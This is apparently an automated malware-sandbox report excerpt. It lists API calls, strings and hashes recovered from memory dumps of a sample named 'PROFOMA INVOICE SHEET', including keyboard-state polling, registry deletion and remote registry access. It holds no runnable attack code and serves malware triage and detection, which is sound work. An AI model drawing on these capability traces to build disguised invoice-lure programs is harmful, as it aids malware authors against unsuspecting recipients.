                                    • Opcode Fuzzy Hash: 6a520480ca2d12ee1b31e6bb9831db5617304610b33e60304edd18e8786c3d0c
                                    • Instruction Fuzzy Hash: EB610375D00219EFCF05DFA4D884EAEBBB9FF48310F20856AE955A7250E771A941CF60
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0033DAA1
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D659
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D66B
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D67D
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D68F
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6A1
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6B3
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6C5
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6D7
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6E9
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6FB
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D70D
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D71F
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D731
                                    • _free.LIBCMT ref: 0033DA96
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 0033DAB8
                                    • _free.LIBCMT ref: 0033DACD
                                    • _free.LIBCMT ref: 0033DAD8
                                    • _free.LIBCMT ref: 0033DAFA
                                    • _free.LIBCMT ref: 0033DB0D
                                    • _free.LIBCMT ref: 0033DB1B
                                    • _free.LIBCMT ref: 0033DB26
                                    • _free.LIBCMT ref: 0033DB5E
                                    • _free.LIBCMT ref: 0033DB65
                                    • _free.LIBCMT ref: 0033DB82
                                    • _free.LIBCMT ref: 0033DB9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: e03c394a56c8d4b95fdd3fff21d489a41358c0d454e8bef3b4c900a6f479bf23
                                    • Instruction ID: e222e8fe3f041ad41d0897d0bb7342bbbefa32180e13541a3c95c5510ffcabc0
                                    • Opcode Fuzzy Hash: e03c394a56c8d4b95fdd3fff21d489a41358c0d454e8bef3b4c900a6f479bf23
                                    • Instruction Fuzzy Hash: D83138326047059FEB23AA39F885B5BB7E9FF01311F164469F459DB191DF31AC908B20
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0036369C
                                    • _wcslen.LIBCMT ref: 003636A7
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00363797
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0036380C
                                    • GetDlgCtrlID.USER32(?), ref: 0036385D
                                    • GetWindowRect.USER32(?,?), ref: 00363882
                                    • GetParent.USER32(?), ref: 003638A0
                                    • ScreenToClient.USER32(00000000), ref: 003638A7
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00363921
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0036395D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                    • String ID: %s%u
                                    • API String ID: 4010501982-679674701
                                    • Opcode ID: 004ce61b002a1a6cb13c15dd23759c0a94913bb66a75be431ba9cb09ffebf4ed
                                    • Instruction ID: 24b0c1145067998114da21742528206a2c2a5a899d9592a06d7b47aebe35279f
                                    • Opcode Fuzzy Hash: 004ce61b002a1a6cb13c15dd23759c0a94913bb66a75be431ba9cb09ffebf4ed
                                    • Instruction Fuzzy Hash: 8991A071204706AFD71ADF24C885BEAF7E8FF44350F008529F99AD6194DB30EA55CB91
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000400), ref: 00364994
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 003649DA
                                    • _wcslen.LIBCMT ref: 003649EB
                                    • CharUpperBuffW.USER32(?,00000000), ref: 003649F7
                                    • _wcsstr.LIBVCRUNTIME ref: 00364A2C
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00364A64
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00364A9D
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00364AE6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 00364B20
                                    • GetWindowRect.USER32(?,?), ref: 00364B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                    • String ID: ThumbnailClass
                                    • API String ID: 1311036022-1241985126
                                    • Opcode ID: 79ddcd6c3467c10eba0f5dca5173c026b6a4c7a286d3fc2ff1ed85aa182786f7
                                    • Instruction ID: 517c15bd8835f5db5f7c55519a920c2bbdfe8402cbe707decd7e029445e20c77
                                    • Opcode Fuzzy Hash: 79ddcd6c3467c10eba0f5dca5173c026b6a4c7a286d3fc2ff1ed85aa182786f7
                                    • Instruction Fuzzy Hash: A791AD31808205AFDB06DF14C985BAA77E8FF84714F04846AFD859B19AEB30ED45CBA1
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0038CC64
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0038CC8D
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0038CD48
                                      • Part of subcall function 0038CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0038CCAA
                                      • Part of subcall function 0038CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0038CCBD
                                      • Part of subcall function 0038CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0038CCCF
                                      • Part of subcall function 0038CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0038CD05
                                      • Part of subcall function 0038CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0038CD28
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0038CCF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2734957052-4033151799
                                    • Opcode ID: 9e56dca81c5f0bcf76c5d59a63b9dcd27c4e970a7b21e079d86965db0d54ae85
                                    • Instruction ID: a39b60dc160f144c5e2ce23dce2765d405ce66b9f7dfc9a37c9851035d801382
                                    • Opcode Fuzzy Hash: 9e56dca81c5f0bcf76c5d59a63b9dcd27c4e970a7b21e079d86965db0d54ae85
                                    • Instruction Fuzzy Hash: 5C318071911228BBDB22AB55DC88EFFBB7CEF45740F0111A6E906E3240D6309E49DBB0
                                    APIs
                                    • timeGetTime.WINMM ref: 0036E6B4
                                      • Part of subcall function 0031E551: timeGetTime.WINMM(?,?,0036E6D4), ref: 0031E555
                                    • Sleep.KERNEL32(0000000A), ref: 0036E6E1
                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0036E705
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0036E727
                                    • SetActiveWindow.USER32 ref: 0036E746
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0036E754
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0036E773
                                    • Sleep.KERNEL32(000000FA), ref: 0036E77E
                                    • IsWindow.USER32 ref: 0036E78A
                                    • EndDialog.USER32(00000000), ref: 0036E79B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: a50a26e3ddac7d02dc52126e035238b9389729442e2d94f2aff93b438f00ff76
                                    • Instruction ID: 45c9cc7588ee161c590a882f9d39803b9b6cb3b56702acf846291f018c6e5626
                                    • Opcode Fuzzy Hash: a50a26e3ddac7d02dc52126e035238b9389729442e2d94f2aff93b438f00ff76
                                    • Instruction Fuzzy Hash: 9A21C3B8210301AFEB035F64FC89A263B6DFB65348F109427F841821A5DBB2EC088B24
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0036EA5D
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0036EA73
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036EA84
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0036EA96
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0036EAA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: SendString$_wcslen
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2420728520-1007645807
                                    • Opcode ID: 8da4ed1ec82e2c3a5822b37a9dc5d8dd43924b9d37319ab00be95c9b0bf4dbd5
                                    • Instruction ID: d93387462f3759599a8101c1e55ea7de258174a34a425eab17ffa38afee6907c
                                    • Opcode Fuzzy Hash: 8da4ed1ec82e2c3a5822b37a9dc5d8dd43924b9d37319ab00be95c9b0bf4dbd5
                                    • Instruction Fuzzy Hash: 4C11A035A9125979D722A7A5DD5BEFF6A7CEFD1B00F00042AB801E60D5EFB00E08C6B0
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 00365CE2
                                    • GetWindowRect.USER32(00000000,?), ref: 00365CFB
                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00365D59
                                    • GetDlgItem.USER32(?,00000002), ref: 00365D69
                                    • GetWindowRect.USER32(00000000,?), ref: 00365D7B
                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00365DCF
                                    • GetDlgItem.USER32(?,000003E9), ref: 00365DDD
                                    • GetWindowRect.USER32(00000000,?), ref: 00365DEF
                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00365E31
                                    • GetDlgItem.USER32(?,000003EA), ref: 00365E44
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00365E5A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00365E67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: a20530e96ebe5ca1fc579395b646805a907f05e85de945310fc096d648ef0908
                                    • Instruction ID: 854eda2fc0d2bfc4e16c4771ba8e8113d297ab3344db88b2aed3fcde48f16fe0
                                    • Opcode Fuzzy Hash: a20530e96ebe5ca1fc579395b646805a907f05e85de945310fc096d648ef0908
                                    • Instruction Fuzzy Hash: 0A512E71B10605AFDF19CFA8CD89AAEBBB9FB48300F548129F515E7294D7719E00CB60
                                    APIs
                                      • Part of subcall function 00318F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00318BE8,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318FC5
                                    • DestroyWindow.USER32(?), ref: 00318C81
                                    • KillTimer.USER32(00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318D1B
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00356973
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 003569A1
                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 003569B8
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00318BBA,00000000), ref: 003569D4
                                    • DeleteObject.GDI32(00000000), ref: 003569E6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 641708696-0
                                    • Opcode ID: 76bea65e06362e1b362ff8d8ad80c800c81057a14240b9155362e8ab3037bf25
                                    • Instruction ID: 7cfc78ddff563337b7cdc83b51910e0d0b296703e510c57c7f95dead1806e903
                                    • Opcode Fuzzy Hash: 76bea65e06362e1b362ff8d8ad80c800c81057a14240b9155362e8ab3037bf25
                                    • Instruction Fuzzy Hash: 9561AC31502600EFCB2B8F14E959BA5B7F9FB48312F55451AE4429BA70CB32ACC4CF98
                                    APIs
                                      • Part of subcall function 00319944: GetWindowLongW.USER32(?,000000EB), ref: 00319952
                                    • GetSysColor.USER32(0000000F), ref: 00319862
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: .2
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0034F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00369717
                                    • LoadStringW.USER32(00000000,?,0034F7F8,00000001), ref: 00369720
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0034F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00369742
                                    • LoadStringW.USER32(00000000,?,0034F7F8,00000001), ref: 00369745
                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00369866
                                    Strings
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    APIs
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003607A2
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003607BE
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003607DA
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00360804
                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0036082C
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00360837
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0036083C
                                    Strings
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00383C5C
                                    • CoInitialize.OLE32(00000000), ref: 00383C8A
                                    • CoUninitialize.OLE32 ref: 00383C94
                                    • _wcslen.LIBCMT ref: 00383D2D
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00383DB1
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00383ED5
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00383F0E
                                    • CoGetObject.OLE32(?,00000000,0039FB98,?), ref: 00383F2D
                                    • SetErrorMode.KERNEL32(00000000), ref: 00383F40
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00383FC4
                                    • VariantClear.OLEAUT32(?), ref: 00383FD8
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                    • String ID:
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 00377AF3
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00377B8F
                                    • SHGetDesktopFolder.SHELL32(?), ref: 00377BA3
                                    • CoCreateInstance.OLE32(0039FD08,00000000,00000001,003C6E6C,?), ref: 00377BEF
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00377C74
                                    • CoTaskMemFree.OLE32(?,?), ref: 00377CCC
                                    • SHBrowseForFolderW.SHELL32(?), ref: 00377D57
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00377D7A
                                    • CoTaskMemFree.OLE32(00000000), ref: 00377D81
                                    • CoTaskMemFree.OLE32(00000000), ref: 00377DD6
                                    • CoUninitialize.OLE32 ref: 00377DDC
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                    • String ID:
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00395504
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00395515
                                    • CharNextW.USER32(00000158), ref: 00395544
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00395585
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0039559B
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003955AC
                                    Similarity
                                    • API ID: MessageSend$CharNext
                                    • String ID:
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0035FAAF
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0035FB08
                                    • VariantInit.OLEAUT32(?), ref: 0035FB1A
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0035FB3A
                                    • VariantCopy.OLEAUT32(?,?), ref: 0035FB8D
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 0035FBA1
                                    • VariantClear.OLEAUT32(?), ref: 0035FBB6
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0035FBC3
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035FBCC
                                    • VariantClear.OLEAUT32(?), ref: 0035FBDE
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035FBE9
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00369CA1
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00369D22
                                    • GetKeyState.USER32(000000A0), ref: 00369D3D
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00369D57
                                    • GetKeyState.USER32(000000A1), ref: 00369D6C
                                    • GetAsyncKeyState.USER32(00000011), ref: 00369D84
                                    • GetKeyState.USER32(00000011), ref: 00369D96
                                    • GetAsyncKeyState.USER32(00000012), ref: 00369DAE
                                    • GetKeyState.USER32(00000012), ref: 00369DC0
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00369DD8
                                    • GetKeyState.USER32(0000005B), ref: 00369DEA
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 003805BC
                                    • inet_addr.WSOCK32(?), ref: 0038061C
                                    • gethostbyname.WSOCK32(?), ref: 00380628
                                    • IcmpCreateFile.IPHLPAPI ref: 00380636
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003806C6
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003806E5
                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 003807B9
                                    • WSACleanup.WSOCK32 ref: 003807BF
                                    Strings
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    APIs
                                    • CoInitialize.OLE32 ref: 00383774
                                    • CoUninitialize.OLE32 ref: 0038377F
                                    • CoCreateInstance.OLE32(?,00000000,00000017,0039FB78,?), ref: 003837D9
                                    • IIDFromString.OLE32(?,?), ref: 0038384C
                                    • VariantInit.OLEAUT32(?), ref: 003838E4
                                    • VariantClear.OLEAUT32(?), ref: 00383936
                                    Strings
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003733CF
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003733F0
                                    Strings
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-3080491070
                                    • Opcode ID: 8f554c0b71a783acfd8171509e2055fe44e115a400738c2dce0a03039c3bfab8
                                    • Instruction ID: 037947fdcf13df00746f3f235310a17bd76803418e1ba879c3e023ce49987670
                                    • Opcode Fuzzy Hash: 8f554c0b71a783acfd8171509e2055fe44e115a400738c2dce0a03039c3bfab8
                                    • Instruction Fuzzy Hash: 69517C71901209ABDF1BEBA0DD52EEEB778AF04340F108166F505B60A2EB356F58DB60
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 1256254125-769500911
                                    • Opcode ID: dd8866c8586bbb60d1ede63badebf499e62b061744d3293e7e9d2ce781525036
                                    • Instruction ID: e70b13a220f5add30bb5bdba6fe3f4580d2594266a7ee3ed8689e8a81abc7929
                                    • Opcode Fuzzy Hash: dd8866c8586bbb60d1ede63badebf499e62b061744d3293e7e9d2ce781525036
                                    • Instruction Fuzzy Hash: 3241D832A011269BCB125F7DC9915BEF7A5AF60754B268129E461DB288E731CDC1CBA0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 003753A0
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00375416
                                    • GetLastError.KERNEL32 ref: 00375420
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 003754A7
                                    Strings
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 3e644080cf6825220b92c61d1857fec23c3a83c2d9f9010bab339696db9f01ad
                                    • Instruction ID: 0b7d42cc2e3fa977ed273a8adc4b9bc4686d1002ed101b8d774309ceaff04639
                                    • Opcode Fuzzy Hash: 3e644080cf6825220b92c61d1857fec23c3a83c2d9f9010bab339696db9f01ad
                                    • Instruction Fuzzy Hash: F531D635A005049FDB26DF69C485FAA7BB8EF05305F15C05AE40ACF292DBB5DD82CB90
                                    APIs
                                    • CreateMenu.USER32 ref: 00393C79
                                    • SetMenu.USER32(?,00000000), ref: 00393C88
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00393D10
                                    • IsMenu.USER32(?), ref: 00393D24
                                    • CreatePopupMenu.USER32 ref: 00393D2E
